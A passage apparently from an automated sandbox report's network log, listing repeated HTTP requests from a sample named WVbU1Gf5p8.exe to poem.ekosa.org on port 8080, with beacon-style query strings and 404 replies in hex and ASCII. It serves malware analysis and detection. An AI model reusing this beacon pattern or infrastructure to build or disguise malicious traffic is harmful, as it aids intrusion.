      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:50.798779011 CET5225INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      196192.168.2.449976210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:51.066354036 CET5226OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:51.329032898 CET5226INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      197192.168.2.449977210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:51.603130102 CET5227OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:51.866241932 CET5227INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      198192.168.2.449978210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:52.263866901 CET5228OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:52.534707069 CET5229INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      199192.168.2.449979210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:52.803566933 CET5229OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:53.063415051 CET5230INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.449759210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:57.754849911 CET93OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:58.014203072 CET94INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      20192.168.2.449784210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:08.144635916 CET389OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:08.404642105 CET390INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      200192.168.2.449980210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:53.335024118 CET5231OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:53.597409964 CET5232INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      201192.168.2.449981210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:53.972723961 CET5233OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:54.233335018 CET5233INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      202192.168.2.449982210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:54.505481958 CET5235OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:54.767642021 CET5235INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:54 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      203192.168.2.449983210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:55.040930033 CET5236OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:55.305458069 CET5236INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:54 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
